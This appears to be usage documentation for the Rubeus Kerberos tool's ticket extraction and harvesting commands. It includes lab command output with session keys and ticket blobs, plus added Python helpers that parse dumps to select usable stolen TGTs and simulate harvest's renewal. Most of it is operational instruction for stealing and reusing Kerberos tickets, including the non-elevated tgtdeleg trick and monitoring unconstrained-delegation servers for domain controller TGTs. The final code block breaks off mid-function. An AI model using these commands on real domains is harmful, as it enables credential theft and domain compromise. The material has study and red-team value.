Ticket Extraction and Harvesting
Breakdown of the ticket extraction/harvesting commands:

| Command  | Description                                           |
|----------|-------------------------------------------------------|
| triage   | LUID, username, service target, ticket expiration     |
| klist    | Detailed logon session and ticket info                |
| dump     | Detailed logon session and ticket data                |
| tgtdeleg | Retrieve usable TGT for non-elevated user             |
| monitor  | Monitor logon events and dump new tickets             |
| harvest  | Same as monitor but with auto-renewal functionality   |
triage
The triage action outputs a table of the current user's Kerberos tickets if not elevated. If run from an elevated context, a table describing all Kerberos tickets on the system is displayed. Tickets can be filtered for a specific service with /service:SNAME.

If elevated, tickets can also be filtered for a specific LogonID with /luid:0xA.. or a specific user with /user:USER. This is useful when triaging systems with a lot of Kerberos tickets.
Triage all enumerable tickets (non-elevated):
C:\Rubeus>Rubeus.exe triage
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: Triage Kerberos Tickets (Current User)
[*] Current LUID : 0x4420e
-----------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------------------------------
| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |
| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |
| 0x4420e | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 4:04:14 PM |
-----------------------------------------------------------------------------------------
Triage all enumerable tickets (elevated):
C:\Rubeus>Rubeus.exe triage
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: Triage Kerberos Tickets (All Users)
-------------------------------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-------------------------------------------------------------------------------------------------------------
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 4:04:14 PM |
| 0x56cdd86 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:02 PM |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:19:11 PM |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:19:11 PM |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 3:19:11 PM |
| 0x47869b4 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:05:29 PM |
| 0x3c4c241 | dfm.a @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/11/2019 4:24:02 AM |
| 0x441d8 | dfm.a @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/10/2019 11:41:26 PM |
| 0x441d8 | dfm.a @ TESTLAB.LOCAL | LDAP/primary.testlab.local | 2/10/2019 11:41:26 PM |
| 0x3e4 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 1:25:01 PM |
| 0x3e4 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 1:25:01 PM |
| 0x3e4 | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local | 2/12/2019 1:25:01 PM |
| 0x3e4 | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 2:23:45 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 2:23:45 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | WINDOWS10$ | 2/12/2019 2:23:45 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |
-------------------------------------------------------------------------------------------------------------
Triage targeting a specific service (elevated):
C:\Rubeus>Rubeus.exe triage /service:ldap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: Triage Kerberos Tickets (All Users)
[*] Target service : ldap
-----------------------------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------------------------------------------------
| 0x441d8 | dfm.a @ TESTLAB.LOCAL | LDAP/primary.testlab.local | 2/10/2019 11:41:26 PM |
| 0x3e4 | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |
-----------------------------------------------------------------------------------------------------------
klist
The klist action lists detailed information on the current user's logon session and Kerberos tickets if not elevated. If run from an elevated context, information on all logon sessions and their associated Kerberos tickets is displayed. Logon and ticket information can be displayed for a specific LogonID with /luid:0xA.. (if elevated).
Listing the current (non-elevated) user's logon session and Kerberos ticket information:
C:\Rubeus>Rubeus.exe klist
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: List Kerberos Tickets (Current User)
[*] Current LUID : 0x4420e
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/12/2019 11:04:14 AM ; 2/12/2019 4:04:14 PM ; 2/19/2019 11:04:14 AM
Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
Client Name : harmj0y @ TESTLAB.LOCAL
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
...(snip)...
Elevated listing of another user's logon session/Kerberos ticket information:
C:\Rubeus>Rubeus.exe klist /luid:0x47869b4
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (All Users)
[*] Target LUID : 0x47869b4
UserName : harmj0y
Domain : TESTLAB
LogonId : 0x47869b4
UserSID : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage : Kerberos
LogonType : Interactive
LogonTime : 2/11/2019 11:05:31 PM
LogonServer : PRIMARY
LogonServerDNSDomain : TESTLAB.LOCAL
UserPrincipalName : [email protected]
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/11/2019 3:05:31 PM ; 2/11/2019 8:05:31 PM ; 2/18/2019 3:05:31 PM
Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
Client Name : harmj0y @ TESTLAB.LOCAL
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
...(snip)...
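The klist listings above print each ticket's flags by name and, in parentheses, the raw 32-bit TicketFlags mask (60a10000, 40e10000). The following is an added example, not Rubeus code, that decodes that mask with the bit values from RFC 4120 section 5.4.1 (bit 0 is the most significant bit of the 32-bit word, the layout Rubeus prints), parses klist entries, checks that the printed names agree with the mask, and picks out TGTs that are still valid and forwardable. The sample text is constructed from the two entries shown above; the helper names (parse_klist, tgt_origin, usable_tgts) are this example's own.

```python
# Added example (not part of Rubeus): decode the hex TicketFlags mask that
# `klist` prints after the flag names, e.g. "(60a10000)", and classify the
# TGTs in a klist listing. Bit values follow RFC 4120 section 5.4.1
# (TicketFlags as a 32-bit bit string, bit 0 = MSB). SAMPLE_KLIST is
# constructed from the listing on this page.
import re
from datetime import datetime

TIME_FMT = "%m/%d/%Y %I:%M:%S %p"

TICKET_FLAGS = {
    0x80000000: "reserved",
    0x40000000: "forwardable",
    0x20000000: "forwarded",
    0x10000000: "proxiable",
    0x08000000: "proxy",
    0x04000000: "may_postdate",
    0x02000000: "postdated",
    0x01000000: "invalid",
    0x00800000: "renewable",
    0x00400000: "initial",
    0x00200000: "pre_authent",
    0x00100000: "hw_authent",
    0x00080000: "transited_policy_checked",
    0x00040000: "ok_as_delegate",
    0x00020000: "anonymous",
    0x00010000: "name_canonicalize",
}

ENTRY_RE = re.compile(
    r"\[\d+\] - 0x[0-9a-f]+ - (?P<etype>\S+)\s*\n"
    r"\s*Start/End/MaxRenew:\s*(?P<start>[^;]+);\s*(?P<end>[^;]+);\s*(?P<renew>.+?)\s*\n"
    r"\s*Server Name\s*:\s*(?P<server>.+?)\s*\n"
    r"\s*Client Name\s*:\s*(?P<client>.+?)\s*\n"
    r"\s*Flags\s*:\s*(?P<flags>.+?)\s*\((?P<mask>[0-9a-f]{8})\)",
    re.IGNORECASE,
)

SAMPLE_KLIST = """\
[0] - 0x12 - aes256_cts_hmac_sha1
  Start/End/MaxRenew: 2/12/2019 11:04:14 AM ; 2/12/2019 4:04:14 PM ; 2/19/2019 11:04:14 AM
  Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
  Client Name       : harmj0y @ TESTLAB.LOCAL
  Flags             : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)

[1] - 0x12 - aes256_cts_hmac_sha1
  Start/End/MaxRenew: 2/11/2019 3:05:31 PM ; 2/11/2019 8:05:31 PM ; 2/18/2019 3:05:31 PM
  Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
  Client Name       : harmj0y @ TESTLAB.LOCAL
  Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
"""


def parse_time(s):
    return datetime.strptime(s.strip(), TIME_FMT)


def decode_flags(mask):
    """Flag names set in a 32-bit mask, lowest bit value first (Rubeus' print order)."""
    return [name for value, name in sorted(TICKET_FLAGS.items()) if mask & value]


def tgt_origin(flags):
    """How a TGT was obtained: 'initial' = AS exchange with the user's key;
    'forwarded' = a delegated copy obtained via TGS-REQ with the FORWARDED
    option (what unconstrained delegation and tgtdeleg hand out);
    'tgs' = anything else (e.g. a renewed TGT)."""
    if "initial" in flags:
        return "initial"
    if "forwarded" in flags:
        return "forwarded"
    return "tgs"


def parse_klist(text):
    tickets = []
    for m in ENTRY_RE.finditer(text):
        mask = int(m["mask"], 16)
        names = [f.strip() for f in m["flags"].split(",")]
        tickets.append({
            "etype": m["etype"],
            "start": parse_time(m["start"]),
            "end": parse_time(m["end"]),
            "renew_until": parse_time(m["renew"]),
            "server": m["server"].split(" @ ")[0],
            "client": m["client"],
            "mask": mask,
            "flags": names,
            # True when the printed names agree with the printed mask
            "flags_consistent": names == decode_flags(mask),
        })
    return tickets


def usable_tgts(tickets, now):
    """TGTs valid at `now` whose forwardable bit is set (a precondition for
    the delegation-based tgtdeleg trick described later on this page)."""
    return [t for t in tickets
            if t["server"].lower().startswith("krbtgt/")
            and t["start"] <= now < t["end"]
            and "forwardable" in t["flags"]]
```

The forwarded/initial distinction is the useful signal when reading an elevated klist on a server: a TGT with forwarded set in a service's logon session is a delegated copy of someone else's TGT, which is exactly what monitor and harvest below are after.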
dump
The dump action extracts all current TGTs and service tickets if run in an elevated context. If not elevated, the current user's tickets are extracted, but the TGTs come back without their session keys (see the note below). The extracted tickets can be filtered by service (/service:SNAME; use /service:krbtgt for TGTs) and/or logon ID (/luid:0xA..). The KRB-CRED files (.kirbis) are output as base64 blobs and can be reused with the ptt action or Mimikatz's kerberos::ptt functionality.

Note: if run from a non-elevated context, the session keys for TGTs are not returned (by default) by the associated LSA APIs, which is why the non-elevated dump below shows an all-zero Base64SessionKey for the krbtgt ticket; only the extracted service tickets are usable. To (somewhat) work around this, use the tgtdeleg action.
Extracting the current user's usable service tickets:
C:\Rubeus>Rubeus.exe dump
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: Dump Kerberos Ticket Data (Current User)
[*] Current LUID : 0x4420e
[*] Returned 3 tickets
ServiceName : krbtgt/TESTLAB.LOCAL
TargetName : krbtgt/TESTLAB.LOCAL
ClientName : harmj0y
DomainName : TESTLAB.LOCAL
TargetDomainName : TESTLAB.LOCAL
AltTargetDomainName : TESTLAB.LOCAL
SessionKeyType : rc4_hmac
Base64SessionKey : AAAAAAAAAAAAAAAAAAAAAA==
KeyExpirationTime : 12/31/1600 4:00:00 PM
TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime : 2/11/2019 3:19:15 PM
EndTime : 2/11/2019 8:19:13 PM
RenewUntil : 2/18/2019 3:19:13 PM
TimeSkew : 0
EncodedTicketSize : 1306
Base64EncodedTicket :
doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...
...(snip)...
[*] Enumerated 3 total tickets
[*] Extracted 3 total tickets
Elevated extraction of tickets from a specific logon session:
C:\Rubeus>Rubeus.exe dump /luid:0x47869cc
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Dump Kerberos Ticket Data (All Users)
[*] Target LUID: 0x47869cc
UserName : harmj0y
Domain : TESTLAB
LogonId : 0x47869cc
UserSID : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage : Negotiate
LogonType : Interactive
LogonTime : 2/11/2019 11:05:31 PM
LogonServer : PRIMARY
LogonServerDNSDomain : TESTLAB.LOCAL
UserPrincipalName : [email protected]
[*] Enumerated 3 ticket(s):
ServiceName : krbtgt/TESTLAB.LOCAL
TargetName : krbtgt/TESTLAB.LOCAL
ClientName : harmj0y
DomainName : TESTLAB.LOCAL
TargetDomainName : TESTLAB.LOCAL
AltTargetDomainName : TESTLAB.LOCAL
SessionKeyType : rc4_hmac
Base64SessionKey : u9DOCzuGKAZB6h/E/9XcFg==
KeyExpirationTime : 12/31/1600 4:00:00 PM
TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime : 2/11/2019 3:21:53 PM
EndTime : 2/11/2019 8:19:13 PM
RenewUntil : 2/18/2019 3:19:13 PM
TimeSkew : 0
EncodedTicketSize : 1306
Base64EncodedTicket :
doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...
ServiceName : krbtgt/TESTLAB.LOCAL
TargetName : krbtgt/TESTLAB.LOCAL
ClientName : harmj0y
DomainName : TESTLAB.LOCAL
TargetDomainName : TESTLAB.LOCAL
AltTargetDomainName : TESTLAB.LOCAL
SessionKeyType : aes256_cts_hmac_sha1
Base64SessionKey : tKcszT8rdYyxBxBHlkpmJ/SEsfON8mBMs4ZN/29Xv8A=
KeyExpirationTime : 12/31/1600 4:00:00 PM
TicketFlags : name_canonicalize, pre_authent, initial, renewable, forwardable
StartTime : 2/11/2019 3:19:13 PM
EndTime : 2/11/2019 8:19:13 PM
RenewUntil : 2/18/2019 3:19:13 PM
TimeSkew : 0
EncodedTicketSize : 1338
Base64EncodedTicket :
doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...
...(snip)...
[*] Enumerated 3 total tickets
[*] Extracted 3 total tickets
Elevated extraction of all TGTs on a system:
C:\Rubeus>Rubeus.exe dump /service:krbtgt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Dump Kerberos Ticket Data (All Users)
[*] Target service : krbtgt
UserName : harmj0y
Domain : TESTLAB
LogonId : 0x47869cc
UserSID : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage : Negotiate
LogonType : Interactive
LogonTime : 2/11/2019 11:05:31 PM
LogonServer : PRIMARY
LogonServerDNSDomain : TESTLAB.LOCAL
UserPrincipalName : [email protected]
[*] Enumerated 3 ticket(s):
ServiceName : krbtgt/TESTLAB.LOCAL
TargetName : krbtgt/TESTLAB.LOCAL
ClientName : harmj0y
DomainName : TESTLAB.LOCAL
TargetDomainName : TESTLAB.LOCAL
AltTargetDomainName : TESTLAB.LOCAL
SessionKeyType : rc4_hmac
Base64SessionKey : y4LL+W3KZoOjnwsiwf150g==
KeyExpirationTime : 12/31/1600 4:00:00 PM
TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime : 2/11/2019 3:23:50 PM
EndTime : 2/11/2019 8:19:13 PM
RenewUntil : 2/18/2019 3:19:13 PM
TimeSkew : 0
EncodedTicketSize : 1306
Base64EncodedTicket :
doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...
...(snip)...
UserName : WINDOWS10$
Domain : TESTLAB
LogonId : 0x3e4
UserSID : S-1-5-20
AuthenticationPackage : Negotiate
LogonType : Service
LogonTime : 2/7/2019 4:51:20 PM
LogonServer :
LogonServerDNSDomain : testlab.local
UserPrincipalName : [email protected]
[*] Enumerated 4 ticket(s):
ServiceName : krbtgt/TESTLAB.LOCAL
TargetName : krbtgt/TESTLAB.LOCAL
ClientName : WINDOWS10$
DomainName : TESTLAB.LOCAL
TargetDomainName : TESTLAB.LOCAL
AltTargetDomainName : TESTLAB.LOCAL
SessionKeyType : rc4_hmac
Base64SessionKey : 0NgsSyZ/XOCTi9wLR1z9Kg==
KeyExpirationTime : 12/31/1600 4:00:00 PM
TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime : 2/11/2019 3:23:50 PM
EndTime : 2/11/2019 7:23:48 PM
RenewUntil : 2/18/2019 2:23:48 PM
TimeSkew : 0
EncodedTicketSize : 1304
Base64EncodedTicket :
doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...
...(snip)...
[*] Enumerated 20 total tickets
[*] Extracted 9 total tickets
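When a dump is captured as text rather than worked with live, the thing a practitioner needs first is which of the blobs are actually usable: a TGT whose Base64SessionKey decodes to all zeros (the non-elevated case noted above) will not work for pass-the-ticket. The following is an added example, not Rubeus code, that parses dump output into records, attaches each ticket to the LogonId header it was listed under, flags zero-key tickets, and approximates the /service and /luid filters. SAMPLE_DUMP is constructed from the listings above (it is not a real dump, and its first record is given an all-zero key on purpose); parse_dump, session_key_is_zero and select_tickets are this example's own names.

```python
# Added example (not part of Rubeus): parse the text that `dump` prints into
# records, attach each ticket to the logon session it was listed under, flag
# TGTs whose session key came back all-zero (what a non-elevated dump returns
# for TGTs), and approximate the /service and /luid filters. SAMPLE_DUMP is
# constructed from the listings on this page; the first record's session key
# is all zeros on purpose.
import base64
import re

LUID_RE = re.compile(r"(?:LogonId|Current LUID|Target LUID)\s*:\s*(0x[0-9a-fA-F]+)")
KV_RE = re.compile(r"^\s*(?P<key>[A-Za-z0-9_]+)\s*:\s*(?P<value>.*?)\s*$")
TICKET_FIELDS = {
    "TargetName", "ClientName", "DomainName", "TargetDomainName",
    "AltTargetDomainName", "SessionKeyType", "Base64SessionKey",
    "KeyExpirationTime", "TicketFlags", "StartTime", "EndTime", "RenewUntil",
    "TimeSkew", "EncodedTicketSize", "Base64EncodedTicket",
}

SAMPLE_DUMP = """\
[*] Action: Dump Kerberos Ticket Data (All Users)

  UserName                 : harmj0y
  LogonId                  : 0x4420e
  [*] Enumerated 2 ticket(s):

  ServiceName              :  krbtgt/TESTLAB.LOCAL
  ClientName               :  harmj0y
  SessionKeyType           :  rc4_hmac
  Base64SessionKey         :  AAAAAAAAAAAAAAAAAAAAAA==
  TicketFlags              :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  StartTime                :  2/11/2019 3:19:15 PM
  EndTime                  :  2/11/2019 8:19:13 PM
  Base64EncodedTicket   :
    doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...

  ServiceName              :  cifs/primary.testlab.local
  ClientName               :  harmj0y
  SessionKeyType           :  aes256_cts_hmac_sha1
  Base64SessionKey         :  tKcszT8rdYyxBxBHlkpmJ/SEsfON8mBMs4ZN/29Xv8A=
  TicketFlags              :  name_canonicalize, pre_authent, renewable, forwardable
  StartTime                :  2/11/2019 3:21:53 PM
  EndTime                  :  2/11/2019 8:19:13 PM
  Base64EncodedTicket   :
    doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...

  UserName                 : WINDOWS10$
  LogonId                  : 0x3e4
  [*] Enumerated 1 ticket(s):

  ServiceName              :  krbtgt/TESTLAB.LOCAL
  ClientName               :  WINDOWS10$
  SessionKeyType           :  rc4_hmac
  Base64SessionKey         :  0NgsSyZ/XOCTi9wLR1z9Kg==
  TicketFlags              :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  StartTime                :  2/11/2019 3:23:50 PM
  EndTime                  :  2/11/2019 7:23:48 PM
  Base64EncodedTicket   :
    doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...
"""


def parse_dump(text):
    """Return one dict per ticket; 'LUID' is the logon session it was listed under."""
    records, current, luid, want_blob = [], None, None, False
    for line in text.splitlines():
        if want_blob:                       # the base64 .kirbi sits on the line after its label
            if line.strip():
                current["Base64EncodedTicket"] = line.strip()
                want_blob = False
            continue
        lm = LUID_RE.search(line)
        if lm:                              # a logon-session header closes any open record
            luid, current = lm.group(1).lower(), None
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, value = m["key"], m["value"]
        if key == "ServiceName":
            current = {"LUID": luid, "ServiceName": value}
            records.append(current)
        elif current is not None and key in TICKET_FIELDS:
            if key == "Base64EncodedTicket" and not value:
                want_blob = True
            else:
                current[key] = value
    return records


def session_key_is_zero(record):
    """An all-zero (or missing) session key means the .kirbi cannot be used for pass-the-ticket."""
    key = base64.b64decode(record.get("Base64SessionKey", ""))
    return not any(key)


def select_tickets(records, service=None, luid=None, usable_only=True):
    """Approximate /service (case-insensitive prefix, as /service:ldap matched
    LDAP/... in the triage above) and /luid filtering; drops zero-key tickets by default."""
    out = []
    for r in records:
        if service and not r["ServiceName"].lower().startswith(service.lower()):
            continue
        if luid and r["LUID"] != luid.lower():
            continue
        if usable_only and session_key_is_zero(r):
            continue
        out.append(r)
    return out
```

With a real dump the Base64EncodedTicket value is the complete KRB-CRED; base64-decoding it and writing the bytes to a .kirbi file gives the same artifact the ptt action consumes. The snipped blobs in the constructed sample are kept as strings only.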
tgtdeleg
The tgtdeleg action uses @gentilkiwi's Kekeo trick (tgt::deleg) that abuses the Kerberos GSS-API to retrieve a usable TGT for the current user without needing elevation on the host. AcquireCredentialsHandle() is used to get a handle to the current user's Kerberos security credentials, and InitializeSecurityContext() is called with the ISC_REQ_DELEGATE flag and a target SPN of HOST/DC.domain.com to prepare a fake delegation context to send to the DC. This results in an AP-REQ in the GSS-API output that contains a KRB-CRED in the authenticator checksum. The service ticket's session key is extracted from the local Kerberos cache and used to decrypt the KRB-CRED in the authenticator, resulting in a usable TGT .kirbi.

If automatic target/domain extraction fails, a known SPN of a service configured with unconstrained delegation can be specified with /target:SPN. The trick depends on the current user's TGT being forwardable and on the target account being trusted for unconstrained delegation (domain controller computer accounts are by default); accounts marked "sensitive and cannot be delegated" or placed in Protected Users will not yield a TGT this way.
C:\Rubeus>Rubeus.exe tgtdeleg
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Request Fake Delegation TGT (current user)
[*] No target SPN specified, attempting to build 'HOST/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'HOST/PRIMARY.testlab.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: YnEFxPfqw3LdfNvLtdFfzaFf7zG3hG+HNjesy+6R+ys=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...
monitor
The monitor action periodically extracts all TGTs every /interval:X seconds (default of 60) and displays any newly captured TGTs. A /targetuser:USER can be specified, returning only ticket data for that user. This function is especially useful on servers with unconstrained delegation enabled ;)

When the /targetuser:USER (or, if not specified, any user) creates a new 4624 logon event, any extracted TGT KRB-CRED data is output.

The /nowrap flag causes the base64 encoded ticket output not to wrap per line.

If you want monitor to run for a specific period of time, use /runfor:SECONDS.

Further, if you wish to save the output to the registry, pass the /registry flag and specify a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR). You can remove this key after you've finished running Rubeus with Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force.
c:\Rubeus>Rubeus.exe monitor /targetuser:DC$ /interval:10
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: TGT Monitoring
[*] Target user : DC$
[*] Monitoring every 10 seconds for new TGTs
[*] 12/21/2019 11:10:16 PM UTC - Found new TGT:
User : [email protected]
StartTime : 12/21/2019 2:44:31 PM
EndTime : 12/21/2019 3:44:31 PM
RenewTill : 12/28/2019 2:13:06 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...
[*] Ticket cache size: 1
Note that this action needs to be run from an elevated context!
harvest
The harvest action takes monitor one step further. It periodically extracts all TGTs every /interval:X seconds (default of 60), extracts any new TGT KRB-CRED files, and keeps a cache of the extracted TGTs. Every interval, any cached TGTs that would expire before the next interval are automatically renewed (up until their renewal limit). Every /displayinterval:X seconds (default of 1200) the current cache of "usable"/valid TGT KRB-CRED .kirbis is output as base64 blobs.

This allows you to harvest usable TGTs from a system without opening a read handle to LSASS, though elevated rights are needed to extract the tickets.

The /nowrap flag causes the base64 encoded ticket output not to wrap per line.

If you want harvest to run for a specific period of time, use /runfor:SECONDS.

Further, if you wish to save the output to the registry, pass the /registry flag and specify a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR). You can remove this key after you've finished running Rubeus with Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force.
c:\Rubeus>Rubeus.exe harvest /interval:30
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v0.0.1a
[*] Action: TGT Harvesting (w/ auto-renewal)
[*] Monitoring every 30 minutes for 4624 logon events
...(snip)...
[*] Renewing TGT for [email protected]
[*] Connecting to 192.168.52.100:88
[*] Sent 1520 bytes
[*] Received 1549 bytes
[*] 9/17/2018 6:43:02 AM - Current usable TGTs:
User : [email protected]
StartTime : 9/17/2018 6:43:02 AM
EndTime : 9/17/2018 11:43:02 AM
RenewTill : 9/24/2018 2:07:48 AM
Flags : name_canonicalize, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFujCCBbagAw...(snip)...
Note that this action needs to be run from an elevated context!
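The difference between monitor and harvest is bookkeeping: monitor reports a TGT the first time it is seen, harvest keeps a per-user cache and, on every tick, renews any TGT that would expire before the next tick while it is still inside its renewal window, dropping the rest. The following is an added example, not Rubeus code, that simulates exactly that scheduling logic offline so the renew/drop decisions can be checked against concrete timestamps. It makes no LSA or network calls; the observed TGTs are constructed (the DC$ one reuses the times from the monitor output above), the 10-hour renewed lifetime is an assumption, and monitor_tick, harvest_tick and usable are this example's own names.

```python
# Added example (not part of Rubeus): the bookkeeping behind `monitor` and
# `harvest`, simulated offline. Observed TGTs below are constructed; no LSA
# calls are made and "renewal" only recomputes lifetimes. The 10-hour
# renewed lifetime is an assumption (it is whatever the KDC hands back).
from datetime import datetime, timedelta

TIME_FMT = "%m/%d/%Y %I:%M:%S %p"
INTERVAL = timedelta(seconds=30)            # like /interval:30


def t(s):
    return datetime.strptime(s, TIME_FMT)


def tgt(user, start, end, renew_till, blob):
    return {"user": user, "start": t(start), "end": t(end),
            "renew_till": t(renew_till), "blob": blob}


# Constructed observations: a DC$ TGT (times taken from the monitor output on
# this page) and a user TGT whose renewal window is about to close.
SAMPLE_TGTS = [
    tgt("DC$@TESTLAB.LOCAL", "12/21/2019 2:44:31 PM", "12/21/2019 3:44:31 PM",
        "12/28/2019 2:13:06 PM", "doIF...(constructed)..."),
    tgt("harmj0y@TESTLAB.LOCAL", "12/21/2019 2:00:00 PM", "12/21/2019 3:00:00 PM",
        "12/21/2019 3:30:00 PM", "doIF...(constructed)..."),
]


def ident(x):
    # monitor treats a (user, start, end) triple it has not seen before as "new"
    return (x["user"].lower(), x["start"], x["end"])


def monitor_tick(seen, observed, target_user=None):
    """monitor: return TGTs not seen on earlier ticks, optionally only for one user."""
    new = []
    for x in observed:
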